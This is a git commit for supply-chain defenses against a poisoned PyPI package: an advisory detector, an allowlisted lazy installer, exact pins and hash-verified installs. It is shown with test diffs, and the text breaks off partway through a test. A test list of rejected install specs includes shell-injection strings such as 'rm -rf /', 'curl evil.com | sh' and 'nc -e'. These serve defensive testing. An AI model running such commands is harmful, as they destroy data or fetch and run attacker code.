feat(security): supply-chain advisory checker + lazy-install framework + tiered install fallback (#24220)

* feat(security): supply-chain advisory checker + lazy-install framework + tiered install fallback

Three coordinated mitigations for the Mini Shai-Hulud worm hitting mistralai 2.4.6 on PyPI (2026-05-12) and for the next single-package compromise that follows.

# What this PR makes true

1. Users with the poisoned mistralai 2.4.6 in their venv get a loud detection banner with copy-pasteable remediation steps the moment they run hermes (and on every gateway startup).
2. One quarantined / yanked PyPI package can no longer silently demote a fresh install to 'core only'; the installer keeps every other extra and tells the user which tier landed.
3. Future opt-in backends (Mistral, ElevenLabs, Honcho, etc.) can lazy-install on first use under a strict allowlist, instead of eagerly pulling everything at install time.

# Detection: hermes_cli/security_advisories.py

- ADVISORIES catalog (one entry currently: shai-hulud-2026-05 for mistralai==2.4.6). Adding the next one is a single dataclass.
- detect_compromised() uses importlib.metadata.version(): no pip dependency, works in uv venvs that lack pip.
- Banner cache (~/.hermes/cache/advisory_banner_seen) rate-limits the startup banner to once per 24h per advisory.
- Acks persisted to security.acked_advisories in config.yaml; never re-banner after ack.
- Wired into:
  * hermes doctor: runs first, prints full remediation block
  * hermes doctor --ack <id>: dismisses an advisory
  * cli.py interactive run() and single-query branches: short stderr banner pointing at hermes doctor
  * gateway/run.py startup: operator-visible warning in gateway.log

# Lazy-install framework: tools/lazy_deps.py

- LAZY_DEPS allowlist maps namespaced feature keys (tts.elevenlabs, memory.honcho, provider.bedrock, etc.) to pip specs.
- ensure(feature) installs missing deps in the active venv via the uv → pip → ensurepip ladder (matches tools_config._pip_install).
- Strict spec safety regex rejects URLs, file paths, shell metas, pip flag injection, control chars; only PyPI-by-name accepted.
- Gated on security.allow_lazy_installs (default true) plus the HERMES_DISABLE_LAZY_INSTALLS env var for restricted/audited envs.
- Migrated three backends as proof of pattern:
  * tools/tts_tool.py: _import_elevenlabs() calls ensure first
  * plugins/memory/honcho/client.py: get_honcho_client lazy-installs
  * tts.mistral / stt.mistral entries pre-registered for when PyPI restores mistralai

# Installer fallback tiers

scripts/install.sh, scripts/install.ps1, setup-hermes.sh:

- Centralised _BROKEN_EXTRAS list (currently: mistral). Edit one array when a transitive breaks; users keep every other extra.
- New 'all minus known-broken' tier between [all] and the existing PyPI-only-extras tier. Only kicks in when [all] fails resolve.
- All three tiers explicit: every fallback announces which tier landed and prints a re-run hint when not on Tier 1.
- install.ps1 and install.sh both regenerate their tier specs from the same _BROKEN_EXTRAS array so updates stay in sync.

Side effect: install.ps1 Tier 2 spec previously hardcoded 'mistral' in its extra list; bug fixed by the refactor (mistral is filtered out).

# Config

hermes_cli/config.py, DEFAULT_CONFIG.security gains:

- acked_advisories: [] (advisory IDs the user has dismissed)
- allow_lazy_installs: True (security gate for ensure())

No config version bump needed: both keys nest under existing security: block, and load_config's deep-merge picks up DEFAULT_CONFIG defaults for users with older configs.
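
As a rough illustration of the spec safety check described in the lazy-install section above, the sketch below accepts only a package name, optional extras, and comma-separated version clauses. The pattern, the `spec_is_safe` name, and the 200-character cap are assumptions made for this example; this is not the regex shipped in tools/lazy_deps.py.

```python
import re

# Hypothetical pattern: name, optional [extras], optional comma-separated
# version clauses. This is NOT the regex shipped in tools/lazy_deps.py.
_NAME = r"[A-Za-z0-9][A-Za-z0-9._-]*"
_EXTRAS = r"(?:\[[A-Za-z0-9._,-]+\])?"
_CLAUSE = r"(?:==|>=|<=|~=|!=|<|>)[A-Za-z0-9.*+!]+"
_SAFE_SPEC = re.compile(rf"{_NAME}{_EXTRAS}(?:{_CLAUSE}(?:,{_CLAUSE})*)?")

_MAX_SPEC_LEN = 200  # assumed cap; the real limit may differ


def spec_is_safe(spec: str) -> bool:
    """Return True only for plain PyPI-by-name requirement specs."""
    if not spec or len(spec) > _MAX_SPEC_LEN:
        return False
    # fullmatch: the entire string must fit the pattern, so a trailing
    # newline, URL scheme, path separator, or shell metacharacter fails.
    return _SAFE_SPEC.fullmatch(spec) is not None
```

An allowlist of characters tends to be easier to audit than a denylist of known-bad ones: anything the pattern does not describe is rejected by default, including pip flags such as `--index-url=...`, which fail because a spec must start with an alphanumeric character.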
# Tests

tests/hermes_cli/test_security_advisories.py, 23 tests covering:

- detect_compromised matches/non-matches, wildcard frozenset
- ack persistence, idempotence, blank rejection, config-failure path
- banner cache rate limiting + 24h re-banner + ack-stops-banner
- short_banner_lines / full_remediation_text / render_doctor_section / gateway_log_message
- shipped catalog well-formedness invariant

tests/tools/test_lazy_deps.py, 40 tests covering:

- spec safety: 11 safe parametrized + 18 unsafe parametrized
- allowlist: unknown-feature rejection, namespace.name shape, every shipped spec passes the safety regex
- security gating: config flag, env var, default, fail-open
- ensure() happy/sad paths: already-satisfied, install success, pip stderr surfaced on failure, install-succeeds-but-still-missing
- is_available, feature_install_command

Combined: 63 new tests, all passing under scripts/run_tests.sh.

# Validation

- scripts/run_tests.sh tests/hermes_cli/test_security_advisories.py tests/tools/test_lazy_deps.py → 63/63 passing
- scripts/run_tests.sh tests/hermes_cli/test_doctor.py tests/hermes_cli/test_doctor_command_install.py tests/tools/test_tts_mistral.py tests/tools/test_transcription_tools.py tests/tools/test_transcription_dotenv_fallback.py → 165/165 passing
- scripts/run_tests.sh tests/hermes_cli/ tests/tools/ → 9191 passed, 8 pre-existing failures (verified on origin/main before this change)
- bash -n on install.sh and setup-hermes.sh → OK
- py_compile on all modified .py files → OK
- End-to-end smoke test of detect_compromised + render_doctor_section + gateway_log_message with mocked installed version → produces copy-pasteable remediation output

# Community

Full advisory + remediation steps: website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md

Short-form post drafts (Discord, GitHub pinned issue, README banner): scripts/community-announcement-shai-hulud.md

Refs: PR #24205 (mistral disabled), Socket Security advisory
<https://socket.dev/blog/mini-shai-hulud-worm-pypi>

* build(deps): pin every direct dep to ==X.Y.Z (no ranges)

Companion to the supply-chain advisory work: replace every >=/</~= range in pyproject.toml's [project.dependencies] and [project.optional-dependencies] with an exact ==X.Y.Z pin sourced from uv.lock.

Why: ranges allow PyPI to ship a fresh version of any direct dep at any time without a code review on our side. With ranges, the malicious mistralai 2.4.6 release would have been pulled by every fresh 'pip install -e .[all]' for the hours between upload and PyPI's quarantine, exactly the install window we got hit on. Exact pins close that window: the only way a new package version reaches a user is via an intentional update on our end.

What the user-facing change is: nothing, behavior-wise. Every package resolves to the same version it was already resolving to via uv.lock; the pins just remove the resolver's freedom to pick a different one.

Cost: any user installing Hermes alongside another package that requires a newer pin gets a resolver conflict. Acceptable for our isolated-venv install path; documented in the new comment block.

Build-system requires line (setuptools>=61.0) is intentionally left as a range; pinning the build backend would block fresh pip from bootstrapping the build on architectures where that exact wheel isn't available.

mistral extra (mistralai==2.3.0) is pinned but stays out of [all] (per PR #24205). 'uv lock' regeneration will fail until PyPI restores mistralai; lockfile regeneration is gated behind that, NOT on every PR.

LAZY_DEPS in tools/lazy_deps.py also moved to exact pins so the lazy-install pathway can never resolve a different version than the one declared in pyproject.toml.

Validation:

- Cross-checked all 77 pinned direct deps in pyproject.toml against uv.lock: every pin matches the resolved version exactly.
- Cross-checked all LAZY_DEPS specs against uv.lock: same.
- 'uv pip install -e .[all] --dry-run' resolves 205 packages cleanly.
- tests/tools/test_lazy_deps.py + tests/hermes_cli/test_security_advisories.py → 63/63 passing (every shipped spec passes the safety regex).
- Doctor + TTS + transcription targeted suite → 146/146 passing.

* build(deps): hash-verify transitives via uv.lock; remove unresolvable [mistral] extra

You asked: 'what about the dependencies the dependencies rely on?', correctly noting that exact-pinning direct deps in pyproject.toml does NOT cover the transitive graph. `pip install` and `uv pip install` both re-resolve transitives fresh from PyPI at install time, so a compromised transitive (e.g. `httpcore` if it got worm-poisoned tomorrow) would still hit our users even with every direct dep exact-pinned.

# What this commit fixes

1. **Both real installer scripts now prefer `uv sync --locked` as Tier 0.** uv.lock records SHA256 hashes for every transitive, so a compromised package with a different hash gets REJECTED. Falls through to the existing `uv pip install` cascade if the lockfile is missing or stale, with a loud warning that the fallback path does NOT hash-verify transitives. Previously only `setup-hermes.sh` (the dev path) used the lockfile; `scripts/install.sh` and `scripts/install.ps1` (the paths fresh users actually run) skipped it.
2. **Removed the `[mistral]` extra entirely.** The `mistralai` PyPI project is fully quarantined right now: every version returns 404, so any pin we wrote was unresolvable, which broke `uv lock --check` in CI. Restoration is documented in pyproject.toml as a 5-step checklist (verify, re-add extra, re-enable in 4 modules, regenerate lock, optionally re-add to [all]).
3. **Regenerated uv.lock.** 262 packages, mistralai/eval-type-backport/jsonpath-python pruned. `uv lock --check` now passes.
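
To illustrate why a recorded hash rejects a swapped artifact, here is a minimal sketch of the comparison involved. It is not uv's implementation; the `artifact_matches_lock` helper is hypothetical and assumes the lockfile entry is a `sha256:<hex>` string.

```python
import hashlib
import hmac


def artifact_matches_lock(data: bytes, locked_hash: str) -> bool:
    """Check downloaded bytes against a 'sha256:<hex>' lockfile entry."""
    algo, _, expected_hex = locked_hash.partition(":")
    if algo != "sha256" or not expected_hex:
        return False  # unknown or malformed entry: refuse rather than guess
    actual_hex = hashlib.sha256(data).hexdigest()
    # compare_digest does a constant-time comparison of the two digests.
    return hmac.compare_digest(actual_hex, expected_hex.lower())


# Usage: the hash is recorded once, when the lockfile is generated.
good_wheel = b"bytes of the reviewed release"
locked = "sha256:" + hashlib.sha256(good_wheel).hexdigest()

print(artifact_matches_lock(good_wheel, locked))           # True
print(artifact_matches_lock(b"tampered release", locked))  # False
```

The point of the sketch is that the check depends only on the bytes received, not on the version string, so a re-uploaded or substituted file under the same version number still fails.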
# Defense-in-depth view

| Layer | Where | Protects against |
|---|---|---|
| Exact pins in pyproject | direct deps | new mistralai 2.4.6-style direct compromise |
| uv.lock + `--locked` install | transitive graph | transitive worm injection |
| Tier-0 hash-verified path | install.sh / .ps1 | actually USE the lockfile in fresh installs |
| `uv lock --check` CI gate | every PR | drift between pyproject and lockfile |
| `hermes_cli/security_advisories.py` | runtime | cleanup for users who already got hit |

The exact pinning + hash verification together close the supply-chain gap. Without the lockfile path, exact pins alone are theater.

# Validation

- `uv lock --check` → passes (262 packages resolved, no drift).
- `bash -n` on install.sh + setup-hermes.sh → OK.
- 209/209 tests passing across new + adjacent test files (test_lazy_deps.py, test_security_advisories.py, test_doctor.py, test_tts_mistral.py, test_transcription_tools.py).
- TOML parse OK.

* chore: remove community announcement drafts (PR body covers it)

* build(deps): lazy-install every opt-in backend (anthropic, search, terminal, platforms, dashboard)

Extends the lazy-install framework to cover everything that's not used by every hermes session. Base install drops from ~60 packages to 45.

Moved out of core dependencies = []:

- anthropic (only when provider=anthropic native, not via aggregators)
- exa-py, firecrawl-py, parallel-web (search backends; only when picked)
- fal-client (image gen; only when picked)
- edge-tts (default TTS but still optional)

New extras in pyproject.toml: [anthropic] [exa] [firecrawl] [parallel-web] [fal] [edge-tts]. All added to [all].

New LAZY_DEPS entries: provider.anthropic, search.{exa,firecrawl,parallel}, tts.edge, image.fal, memory.hindsight, platform.{telegram,discord,matrix}, terminal.{modal,daytona,vercel}, tool.dashboard.

Each import site now calls ensure() before importing the SDK.
Where the module had a top-level try/except (telegram, discord, fastapi), the graceful-fallback pattern was extended to lazy-install on first check_*_requirements() call and re-bind module globals.

Updated test_windows_native_support.py tzdata check from snapshot (>=2023.3 literal) to invariant (any version + win32 marker).

Validation:

- Base install: 45 packages (was ~60); 6 newly-extracted packages absent
- uv lock --check: passes (262 packages, no drift)
- 209/209 lazy_deps + advisory + doctor + tts/transcription tests passing
- py_compile clean on all 12 modified modules
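
The re-binding pattern mentioned above for modules with a top-level try/except might look roughly like the sketch below. All names here are hypothetical: `ensure` is passed in as a plain callable rather than imported from tools/lazy_deps.py, `demo.feature` is a made-up feature key, and a stdlib module stands in for the optional SDK so the example runs anywhere.

```python
import importlib
from types import ModuleType
from typing import Callable, Optional

# Stand-in for an optional third-party SDK. A stdlib module is used here
# only so the sketch runs anywhere; it is not one of the real backends.
_SDK_MODULE = "colorsys"

_sdk: Optional[ModuleType] = None  # module global, bound on first successful check


def check_requirements(
    ensure: Callable[[str], None],
    feature: str = "demo.feature",  # hypothetical feature key
) -> bool:
    """Return True once the SDK is importable, installing it on first use."""
    global _sdk
    if _sdk is not None:
        return True  # already bound; skip both the install and the import
    try:
        ensure(feature)  # expected to raise if the install is refused or fails
        _sdk = importlib.import_module(_SDK_MODULE)  # re-bind the global
    except Exception:
        return False  # graceful fallback: report the feature as unavailable
    return True
```

Because the global is bound only after both steps succeed, a failed install leaves the module in its original "unavailable" state and a later call can retry.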
2026-05-12 01:02:25 -07:00
parent 99ad2d1372
commit c1eb2dcda7
28 changed files with 2433 additions and 243 deletions
--- a/tests/hermes_cli/test_security_advisories.py
+++ b/tests/hermes_cli/test_security_advisories.py
@@ -0,0 +1,330 @@
+"""Tests for hermes_cli.security_advisories.
+
+The advisory module is the user-facing detection / remediation surface
+for supply-chain attacks (e.g. the Mini Shai-Hulud worm of May 2026 that
+poisoned mistralai 2.4.6 on PyPI). These tests exercise the public API in
+isolation — no real package metadata, no real config, no real cache.
+"""
+
+from __future__ import annotations
+
+import time
+from pathlib import Path
+from typing import Iterator
+
+import pytest
+
+import hermes_cli.security_advisories as adv
+
+
+# ---------------------------------------------------------------------------
+# Fixtures
+# ---------------------------------------------------------------------------
+
+
+@pytest.fixture
+def fake_advisory() -> adv.Advisory:
+    """A self-contained Advisory used across tests."""
+    return adv.Advisory(
+        id="test-advisory-2026-99",
+        title="Test advisory",
+        summary="Pretend this package has been compromised.",
+        url="https://example.com/advisory",
+        compromised=(
+            ("fake-malicious-pkg", frozenset({"6.6.6"})),
+        ),
+        remediation=(
+            "pip uninstall -y fake-malicious-pkg",
+            "Rotate any credentials that may have been exposed.",
+        ),
+        published="2026-01-01",
+        severity="critical",
+    )
+
+
+@pytest.fixture
+def isolated_home(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> Path:
+    """Redirect HERMES_HOME so banner cache and config writes are sandboxed."""
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    (home / "cache").mkdir()
+    monkeypatch.setattr(Path, "home", lambda: tmp_path)
+    monkeypatch.setenv("HERMES_HOME", str(home))
+    return home
+
+
+@pytest.fixture
+def patched_version(monkeypatch: pytest.MonkeyPatch) -> Iterator[dict[str, str]]:
+    """Override _installed_version with a controllable lookup table."""
+    table: dict[str, str] = {}
+    monkeypatch.setattr(adv, "_installed_version", lambda pkg: table.get(pkg))
+    yield table
+
+
+# ---------------------------------------------------------------------------
+# detect_compromised
+# ---------------------------------------------------------------------------
+
+
+class TestDetectCompromised:
+    def test_no_match_returns_empty_list(self, fake_advisory, patched_version):
+        # No matching package installed.
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert hits == []
+
+    def test_exact_version_match(self, fake_advisory, patched_version):
+        patched_version["fake-malicious-pkg"] = "6.6.6"
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert len(hits) == 1
+        assert hits[0].advisory.id == fake_advisory.id
+        assert hits[0].package == "fake-malicious-pkg"
+        assert hits[0].installed_version == "6.6.6"
+
+    def test_safe_version_does_not_match(self, fake_advisory, patched_version):
+        # Package is installed but the version is not in the compromised set.
+        patched_version["fake-malicious-pkg"] = "6.6.5"
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert hits == []
+
+    def test_empty_compromised_set_matches_any_version(
+        self, patched_version
+    ):
+        # An advisory with an empty version set is an "any version is suspect"
+        # wildcard — used when an entire maintainer namespace is owned.
+        wildcard = adv.Advisory(
+            id="wildcard",
+            title="Whole namespace owned",
+            summary="x",
+            url="x",
+            compromised=(("evil-namespace", frozenset()),),
+            remediation=("uninstall it",),
+        )
+        patched_version["evil-namespace"] = "0.0.1"
+        hits = adv.detect_compromised(advisories=[wildcard])
+        assert len(hits) == 1
+        assert hits[0].installed_version == "0.0.1"
+
+
+# ---------------------------------------------------------------------------
+# Acknowledgement persistence
+# ---------------------------------------------------------------------------
+
+
+class TestAck:
+    def test_get_acked_ids_empty_when_no_config(self, monkeypatch):
+        # load_config raises → returns empty set, doesn't crash.
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: (_ for _ in ()).throw(RuntimeError("boom")),
+        )
+        assert adv.get_acked_ids() == set()
+
+    def test_filter_unacked_strips_dismissed(self, fake_advisory, monkeypatch):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: {fake_advisory.id})
+        assert adv.filter_unacked([hit]) == []
+
+    def test_filter_unacked_passes_through_unknown(
+        self, fake_advisory, monkeypatch
+    ):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        assert adv.filter_unacked([hit]) == [hit]
+
+    def test_ack_advisory_persists_id(self, isolated_home, monkeypatch):
+        # Stub the config layer end-to-end with a tiny in-memory store so we
+        # don't depend on the full hermes_cli.config bootstrap.
+        store: dict = {"security": {}}
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config", lambda: store
+        )
+        monkeypatch.setattr(
+            "hermes_cli.config.save_config",
+            lambda cfg: store.update(cfg) or None,
+        )
+        assert adv.ack_advisory("test-advisory-2026-99") is True
+        assert "test-advisory-2026-99" in store["security"]["acked_advisories"]
+        # Idempotent.
+        adv.ack_advisory("test-advisory-2026-99")
+        assert (
+            store["security"]["acked_advisories"].count("test-advisory-2026-99")
+            == 1
+        )
+
+    def test_ack_advisory_rejects_blank(self, isolated_home):
+        assert adv.ack_advisory("") is False
+        assert adv.ack_advisory("   ") is False
+
+
+# ---------------------------------------------------------------------------
+# Banner cache rate limiting
+# ---------------------------------------------------------------------------
+
+
+class TestBannerCache:
+    def test_first_call_returns_due_hits(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        due = adv.hits_due_for_banner([hit])
+        assert due == [hit]
+
+    def test_second_call_within_window_suppresses(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        adv.hits_due_for_banner([hit])
+        # Same banner inside repeat window → suppressed.
+        again = adv.hits_due_for_banner([hit])
+        assert again == []
+
+    def test_call_after_window_re_banners(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        adv.hits_due_for_banner([hit])
+        # Backdate the cache so it looks like the banner was shown more
+        # than 24h ago — should re-banner.
+        cache_path = adv._banner_cache_path()
+        assert cache_path is not None
+        old_lines = cache_path.read_text(encoding="utf-8").splitlines()
+        backdated = []
+        for line in old_lines:
+            parts = line.split(None, 1)
+            if len(parts) == 2:
+                backdated.append(f"{parts[0]} {time.time() - 48 * 3600}")
+        cache_path.write_text("\n".join(backdated) + "\n", encoding="utf-8")
+        again = adv.hits_due_for_banner([hit])
+        assert again == [hit]
+
+    def test_acked_hits_never_banner(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: {fake_advisory.id})
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        assert adv.hits_due_for_banner([hit]) == []
+
+
+# ---------------------------------------------------------------------------
+# Rendering
+# ---------------------------------------------------------------------------
+
+
+class TestRendering:
+    def test_short_banner_lines_includes_id_and_version(self, fake_advisory):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        lines = adv.short_banner_lines([hit])
+        joined = "\n".join(lines)
+        assert fake_advisory.id in joined
+        assert fake_advisory.title in joined
+        assert "fake-malicious-pkg==6.6.6" in joined
+        assert "hermes doctor" in joined
+
+    def test_full_remediation_text_contains_all_steps(self, fake_advisory):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        body = "\n".join(adv.full_remediation_text(hit))
+        # All remediation steps must be present.
+        for step in fake_advisory.remediation:
+            assert step in body
+        assert fake_advisory.url in body
+        assert fake_advisory.summary in body
+
+    def test_render_doctor_section_clean_state(self):
+        # No hits → success message, has_problems=False.
+        has_problems, lines = adv.render_doctor_section([])
+        assert has_problems is False
+        assert any("No active security advisories" in line for line in lines)
+
+    def test_render_doctor_section_with_unacked_hit(
+        self, fake_advisory, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        has_problems, lines = adv.render_doctor_section([hit])
+        assert has_problems is True
+        body = "\n".join(lines)
+        assert fake_advisory.title in body
+
+    def test_gateway_log_message_singular(self, fake_advisory, monkeypatch):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        msg = adv.gateway_log_message([hit])
+        assert msg is not None
+        assert fake_advisory.id in msg
+        assert "fake-malicious-pkg==6.6.6" in msg
+
+    def test_gateway_log_message_returns_none_for_no_hits(self):
+        assert adv.gateway_log_message([]) is None
+
+
+# ---------------------------------------------------------------------------
+# Real catalog smoke test
+# ---------------------------------------------------------------------------
+
+
+class TestRealCatalog:
+    def test_advisories_well_formed(self):
+        """Every shipped advisory must be self-consistent.
+
+        Catches data-entry mistakes (empty IDs, missing remediation, bad
+        compromised tuples) before they ship.
+        """
+        seen_ids: set[str] = set()
+        for advisory in adv.ADVISORIES:
+            assert advisory.id, "advisory has empty id"
+            assert advisory.id not in seen_ids, f"duplicate id {advisory.id}"
+            seen_ids.add(advisory.id)
+            assert advisory.title, f"{advisory.id}: empty title"
+            assert advisory.summary, f"{advisory.id}: empty summary"
+            assert advisory.remediation, f"{advisory.id}: empty remediation"
+            assert advisory.url.startswith("http"), \
+                f"{advisory.id}: bad url {advisory.url!r}"
+            assert advisory.compromised, \
+                f"{advisory.id}: empty compromised tuple"
+            for pkg, versions in advisory.compromised:
+                assert pkg, f"{advisory.id}: empty package name"
+                assert isinstance(versions, frozenset), \
+                    f"{advisory.id}: versions must be frozenset"
--- a/tests/tools/test_lazy_deps.py
+++ b/tests/tools/test_lazy_deps.py
@@ -0,0 +1,228 @@
+"""Tests for tools.lazy_deps — the supply-chain-resilient on-demand installer.
+
+The lazy_deps module is the architectural fix for the "one quarantined
+package nukes 10 unrelated extras" problem. It exposes ``ensure(feature)``
+which only installs from a strict allowlist, refuses anything that looks
+like a URL / file path, runs venv-scoped, and respects the
+``security.allow_lazy_installs`` config flag.
+
+These tests cover the security boundary and the public API. The real pip
+call is mocked — we never actually shell out during unit tests.
+"""
+
+from __future__ import annotations
+
+from typing import Iterator
+
+import pytest
+
+import tools.lazy_deps as ld
+
+
+# ---------------------------------------------------------------------------
+# Spec safety
+# ---------------------------------------------------------------------------
+
+
+class TestSpecSafety:
+    @pytest.mark.parametrize("spec", [
+        "mistralai>=2.3.0,<3",
+        "elevenlabs>=1.0,<2",
+        "honcho-ai>=2.0.1,<3",
+        "boto3>=1.35.0,<2",
+        "mautrix[encryption]>=0.20,<1",
+        "google-api-python-client>=2.100,<3",
+        "youtube-transcript-api>=1.2.0",
+        "qrcode>=7.0,<8",
+        "package",  # bare name, no version
+        "package==1.0.0",
+        "package~=1.0",
+    ])
+    def test_safe_specs_pass(self, spec):
+        assert ld._spec_is_safe(spec), f"expected {spec!r} to be safe"
+
+    @pytest.mark.parametrize("spec", [
+        # URL-shaped → rejected (no remote origin override allowed)
+        "git+https://github.com/foo/bar.git",
+        "https://example.com/foo.tar.gz",
+        # File path → rejected
+        "/etc/passwd",
+        "./local-malware",
+        "../escape",
+        # Shell metacharacters → rejected
+        "package; rm -rf /",
+        "package && curl evil.com | sh",
+        "package`whoami`",
+        "package$(whoami)",
+        "package|nc -e",
+        # Pip flag injection → rejected
+        "--index-url=http://evil/",
+        "-r requirements.txt",
+        # Whitespace control chars → rejected
+        "package\nshell-injection",
+        "package\rmore",
+        # Empty / overly long → rejected
+        "",
+        "x" * 500,
+    ])
+    def test_unsafe_specs_rejected(self, spec):
+        assert not ld._spec_is_safe(spec), \
+            f"expected {spec!r} to be rejected"
+
+
+# ---------------------------------------------------------------------------
+# Allowlist enforcement
+# ---------------------------------------------------------------------------
+
+
+class TestAllowlist:
+    def test_unknown_feature_raises(self, monkeypatch):
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        with pytest.raises(ld.FeatureUnavailable, match="not in LAZY_DEPS"):
+            ld.ensure("not.a.real.feature")
+
+    def test_lazy_deps_keys_use_namespace_dot_name(self):
+        # Sanity check on the data shape: every key should contain at
+        # least one dot, i.e. follow the namespace.name convention.
+        for key in ld.LAZY_DEPS:
+            assert "." in key, f"feature {key!r} should be namespace.name"
+
+    def test_every_lazy_dep_spec_passes_safety(self):
+        # Defence in depth — even though specs are author-controlled,
+        # the safety regex must accept everything we ship.
+        for feature, specs in ld.LAZY_DEPS.items():
+            for spec in specs:
+                assert ld._spec_is_safe(spec), \
+                    f"{feature}: spec {spec!r} fails safety check"
+
+    def test_feature_install_command_returns_pip_invocation(self):
+        cmd = ld.feature_install_command("memory.honcho")
+        assert cmd is not None
+        assert cmd.startswith("uv pip install")
+        assert "honcho-ai" in cmd
+
+    def test_feature_install_command_unknown(self):
+        assert ld.feature_install_command("not.real") is None
+
+
+# ---------------------------------------------------------------------------
+# allow_lazy_installs gating
+# ---------------------------------------------------------------------------
+
+
+class TestSecurityGating:
+    def test_disabled_via_config_raises(self, monkeypatch):
+        # Pretend the feature's dependency is missing AND lazy installs are disabled.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.feat", ("packageX>=1.0,<2",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: False)
+        with pytest.raises(ld.FeatureUnavailable, match="lazy installs disabled"):
+            ld.ensure("test.feat", prompt=False)
+
+    def test_disabled_via_env_var(self, monkeypatch):
+        monkeypatch.setenv("HERMES_DISABLE_LAZY_INSTALLS", "1")
+        # Bypass config layer; the env var alone must disable.
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: {"security": {"allow_lazy_installs": True}},
+        )
+        assert ld._allow_lazy_installs() is False
+
+    def test_default_allows(self, monkeypatch):
+        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: {"security": {}},
+        )
+        assert ld._allow_lazy_installs() is True
+
+    def test_config_failure_fails_open(self, monkeypatch):
+        # If config can't be read at all, we ALLOW installs rather than
+        # blocking the user out of their own backends.
+        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: (_ for _ in ()).throw(RuntimeError("config broken")),
+        )
+        assert ld._allow_lazy_installs() is True
+
+
+# ---------------------------------------------------------------------------
+# ensure() happy/sad paths
+# ---------------------------------------------------------------------------
+
+
+class TestEnsure:
+    def test_already_satisfied_is_noop(self, monkeypatch):
+        # If the package is importable, ensure() returns without calling pip.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.satisfied", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
+        # If pip were called, this would fail loudly.
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda *a, **kw: pytest.fail("pip should not be called"),
+        )
+        ld.ensure("test.satisfied", prompt=False)  # no exception
+
+    def test_install_success_path(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.install", ("zzzfake>=1",))
+        # First check sees missing, post-install check sees installed.
+        call_count = {"n": 0}
+
+        def fake_satisfied(spec):
+            call_count["n"] += 1
+            return call_count["n"] > 1  # missing first, installed after
+
+        monkeypatch.setattr(ld, "_is_satisfied", fake_satisfied)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
+        )
+        ld.ensure("test.install", prompt=False)
+
+    def test_install_failure_surfaces_pip_stderr(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.fail", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(
+                False, "", "ERROR: package not found on PyPI"
+            ),
+        )
+        with pytest.raises(ld.FeatureUnavailable, match="pip install failed"):
+            ld.ensure("test.fail", prompt=False)
+
+    def test_install_succeeds_but_still_missing_raises(self, monkeypatch):
+        # pip reports success but the package still isn't importable
+        # (e.g. site-packages caching, wrong python). Surface this as an error.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.cache", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
